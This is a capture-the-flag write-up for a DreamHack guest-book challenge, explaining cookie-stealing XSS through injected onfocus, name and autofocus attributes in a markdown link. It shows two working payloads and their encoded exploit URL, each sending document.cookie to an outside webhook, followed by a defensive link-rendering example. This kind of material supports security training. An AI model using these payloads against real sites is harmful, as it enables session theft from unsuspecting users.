
DreamHack - Guest book write-up

by Janger 2023. 9. 7.

 

Method 1. Using name and onfocus

 

[dreamhack](#' name='foo' onfocus='location.href=`https://bqfyoyg.request.dreamhack.games/cookie=`+document.cookie')

 

URL-encode the text above.

 

%5Bdreamhack%5D%28%23%27%20name%3D%27foo%27%20onfocus%3D%27location%2Ehref%3D%60https%3A%2F%2Fbqfyoyg%2Erequest%2Edreamhack%2Egames%2Fcookie%3D%60%2Bdocument%2Ecookie%27%29

 

Pass the encoded value as the content parameter. The key point is to include #foo at the end of the URL.

http://host3.dreamhack.games:13138/GuestBook.php?content={encoded content}#foo

Visiting the address above automatically focuses the a tag, because the #foo fragment targets the anchor whose name is foo, and the onfocus handler then sends a request to the attacker's webhook.

 

 

 

Method 2. Using autofocus and onfocus

 

[dreamhack](#' autofocus onfocus='location.href=`https://bqfyoyg.request.dreamhack.games/cookie=`+document.cookie')

 

This is a method found in a write-up for another problem. The result is the same as Method 1, even without adding a fragment to the end of the URL.
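The defensive counterpart to both methods, as an added example that is not the challenge's code: a link renderer that encodes the URL before it reaches the href attribute, so a quote in the URL can no longer start new attributes such as name, autofocus or onfocus. It assumes the guest book writes the URL of [text](url) into a single-quoted href without escaping; all function names are hypothetical.

```javascript
// Added example, not the challenge's code. Assumption: the guest book writes
// the URL of [text](url) into a single-quoted href without escaping.

// Constructed input with the same shape as the payloads above.
const SAMPLE = "[dreamhack](#' autofocus onfocus='window.x=1')";

// Encode every character that can close an attribute value or open a tag.
function escapeHtml(s) {
  return String(s).replace(/[&<>"'`]/g, (c) => "&#" + c.charCodeAt(0) + ";");
}

// Allow http(s), same-page fragments and site-relative paths only.
function isSafeUrl(url) {
  if (/[\u0000-\u001f\u007f]/.test(url)) return false; // control chars can hide a scheme
  if (url.startsWith("#")) return true;
  if (/^\/(?![\/\\])/.test(url)) return true; // "/path", but not "//host" or "/\host"
  return /^https?:\/\//i.test(url);
}

// Render markdown-style links; text outside links is escaped as well.
function renderLinks(input) {
  let out = "";
  let last = 0;
  for (const m of input.matchAll(/\[([^\]]*)\]\(([^)]*)\)/g)) {
    const [whole, text, rawUrl] = m;
    const url = rawUrl.trim();
    out += escapeHtml(input.slice(last, m.index));
    out += isSafeUrl(url)
      ? `<a href="${escapeHtml(url)}" rel="noopener noreferrer">${escapeHtml(text)}</a>`
      : escapeHtml(whole); // rejected URL: keep the markup as inert text
    last = m.index + whole.length;
  }
  return out + escapeHtml(input.slice(last));
}

// Attribute names the first <a> tag really carries, for checking the output.
function attributeNames(html) {
  const tag = html.match(/<a\b([^>]*)>/);
  if (!tag) return [];
  return [...tag[1].matchAll(/\s([a-zA-Z-]+)="[^"]*"/g)].map((a) => a[1]);
}

console.log(renderLinks(SAMPLE));
console.log(attributeNames(renderLinks(SAMPLE)));
```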

 

Reference

 

https://security.stackexchange.com/questions/168909/xss-inside-anchor-tag-a-without-user-interaction

 
